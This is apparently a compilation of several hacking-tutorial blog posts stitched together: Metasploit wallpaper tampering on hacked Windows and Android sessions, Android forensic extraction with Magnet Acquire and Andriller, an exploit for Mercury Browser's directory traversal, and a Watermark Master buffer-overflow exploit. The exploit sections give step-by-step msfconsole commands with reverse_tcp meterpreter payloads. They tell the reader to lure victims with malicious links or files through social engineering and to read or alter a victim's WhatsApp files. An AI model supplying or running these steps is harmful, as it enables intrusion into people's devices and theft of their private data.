How to Hack Windows Wallpaper of Remote PC

Today we will learn how change the wallpaper on a Remote System.

Table of Content:

·        Introduction of set_wallpaper module

·        Change Wallpaper on Windows

·        Change Wallpaper on Android

Requirements

Attacker: Kali Linux

Targets: Windows, Android

Introduction of set_wallpaper module

Metasploit Framework is primarily made on Ruby Language. This post exploitation module is also made on Ruby. On the in-depth analysis we get to understand that it targets different services on different platforms to do its job. This module is pretty simple as all it does is set the desktop wallpaper background on the specified session.

When we run the module, Firstly the wallpaper file is located on the attacker machine. After that the file is uploaded to the Victim System on which we have a meterpreter session. The location on which the file is uploaded varies from platform to platform. Next the script uses the suitable method and changes the wallpaper. This module is made by timwr. This module is Normally reliable. Now that we know about the working of the module, let’s change the wallpaper.

Change Wallpaper on Windows

Open Kali Linux terminal and type msfconsole in order to load Metasploit framework.  Now we need to compromise victim’s machine once to achieve any type of session either meterpreter or shell and to do so we can read our previous article from here.

After getting meterpreter on the remote system, now time to use the post exploitation module. But this can’t be done from the meterpreter shell. So, we will use background command in meterpreter session or “Ctrl + z” shortcut to keep the session in background. Now follow the steps shown in the image to use the set_wallpaper post exploitation module.

use post/multi/manage/set_wallpaper

set session 1

set wallpaper_file /root/Desktop/1.jpeg

exploit

This will change the wallpaper on the target system.

Change Wallpaper on Android

Firstly, get a meterpreter session on an Android system. Learn this here.

After getting meterpreter on the remote system, now time to use the post exploitation module. But this can’t be done from the meterpreter shell. So, we will use background command in meterpreter session or “Ctrl + z” shortcut to keep the session in background. Now follow the steps shown in the image to use the set_wallpaper post exploitation module.

use post/multi/manage/set_wallpaper

set session 1

set wallpaper_file /root/Desktop/1.jpeg

exploit

This will change the wallpaper on the target system.

How to Create a Forensic Image of Andorid Phone using Magnet Acquire

Magnet ACQUIRETM is designed to quickly and easily acquire an image of any iOS or Android device. Examiners are given the option of two extraction methods: Quick and Full.

First Download Magnet Acquire from here  and Install in your Computer. Now connect your Android phone with Computer using Data Cable. You will get a pop up on your computer screen which says choose your device. Select the device and click Next.

Quick Extraction:

The Quick Extraction method will work on any IOS device, version 5 or newer. Magnet ACQUIRE will combine an iTunes backup, with some additional acquisition techniques, to obtain both native and third-party data.

Full Extraction:

Magnet ACQUIRE can also help you obtain a full, physical image of many Android devices by using either the built-in privilege escalation exploits or by imaging a device that has already been rooted.

Now select your desired option and click next.

Now you will get a pop up first choose the folder destination and put Examiner name and other details and click ACQUIRE.

On your Android Phone you will get a screen says Full Back up, at the bottom right of your phone screen you will see back up my data click on that.

Process will start as shown below.

Process complete as shown in below Image. Click On Exit.

Magnet Acquire has created a raw image of Android phone in the folder your selected.

Forensics Investigation of Android Phone using Andriller

Andriller - is software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices. It has other features, such as powerful Lockscreen cracking for Pattern, PIN code, or Password; custom decoders for Apps data from Android (and some Apple iOS) databases for decoding communications. Extraction and decoders produce reports in HTML and Excel (.xlsx) formats.

Features

·         Automated data extraction and decoding

·         Data extraction of non-rooted without devices by Android Backup (Android versions 4.x)

·         Data extraction with root permissions: root ADB daemon, CWM recovery mode, or SU binary (Superuser/SuperSU)

·         Data parsing and decoding for Folder structure, Tarball files (from nanddroid backups), and Android Backup ('backup.ab' files)

·         Selection of individual database decoders for Android and Apple

·         Decryption of encrypted WhatsApp archived databases (msgstore.db.crypt, msgstore.db.crypt5, msgstore.db.crypt7, msgstore.db.crypt8)

·         Lockscreen cracking for Pattern, PIN, Password

·         Unpacking the Android backup files

First Download Andriller from here : and install in your Computer.

Now open the Andriller and select output folder. You will get a pop up and select your desired folder.

Now connect your Android phone with computer using Data cable. IN Andriller software click on Check option, if your Android phone is successfully connected with Andriller it will give a Serial ID.

Once you get Serial ID then select the check box which says Open Report & Use AB method and click on GO.

Your will get a Pop up click ok.

On your Android Phone you will get a screen says Full Back up , at the bottom right of your phone screen you will see Back up my data click on that.

Now Andriller will start taking the Back up of your phone and you can see the logs on Andriller as well.

Once the Backup is complete, you can see the complete data in the folder your selected.

You will see a pop up on your browser which will show you the complete phone report.

You can select any of the option to see the details as shown in the below image. Example select WiFi password, you will get all the details which is saved under this folder.

Same way select another option says Android Download history in this you will see all downloads.

Same way select another option says Android Call logs in this you will see all Call details.

Same way select another option says SMS Snippets in this you will see all Overview.

Hack Android Phone WhatsApp and all Directories using Mercury Browser Vulnerability

This module exploits an unsafe intent URI scheme and directory traversal found in Android Mercury Browser version 3.2.3. The intent allows the attacker to invoke a private WIFI manager activity, which starts a web server for Mercury on port 8888. The web server also suffers a directory traversal that allows remote access to sensitive files. By default, this module will go after web view Cookies Chromium.db, web view Cookies Chromium Private.db, webview.db, and bookmarks.db. But if this isn't enough, you can also specify the ADDITIONAL_FILES data store option to collect more files.

Exploit Targets

Android Mercury Browser version 3.2.3

Requirement

Attacker: kali Linux

Victim Phone: Android

Open Kali terminal type msfconsole

Now type use auxiliary/server/android_mercury_paresuri

msf exploit (android_mercury_paresuri)>set payload android/meterpreter/reverse_tcp

msf exploit (android_mercury_paresuri)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (android_mercury_paresuri)>set srvhost 192.168.1.6

msf exploit (android_mercury_paresuri)>set uripath /

msf exploit (android_mercury_paresuri)>exploit

Now an URL you should give to your victim http://192.168.1.6:8080

Go to Google Play Store in your phone and search Mercury Browser for Android and Install it.

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.1.6:8080) it will show the page like given below.

Now on your phone you will get a Notification States, MERCURY WIFI ON...You will have to turn it ON.

You will see a pop up as shown below on your phone screen.

Now on your computer open browse and type IP- 192.168.1.4:8888 and press Enter. Now you will get access to all directories, files & folders which Victim has in his/her phone.

For Example If you want to access victim WhatsApp data, go to WhatsApp folder and you will see different options like Download, Delete & Upload from here you can make changes to his WhatsApp or you can upload any files. As mentioned below

Another Example, if you want to see what Images are in Camera folder use same way as mention above.

Hack Remote PC using Watermark Master Buffer Overflow (SEH)

This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when processing a specially crafted .WCF file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Watermark Master to open a malicious .WCF file.

Exploit Targets

Watermark Master 2.2.23

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/watermark_master

msf exploit (watermark_master)>set payload windows/meterpreter/reverse_tcp

msf exploit (watermark_master)>set lhost 192.168.0.110 (IP of Local Host)

msf exploit (watermark_master)>exploit

After we successfully generate the malicious wcf File, it will stored on your local computer

/root/.msf4/local/msf.wcf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.110

exploit

Now send your msf.wcf files to victim using any social engineering technique. Now when the victim will use Watermark master you will get the meterpreter of victim PC.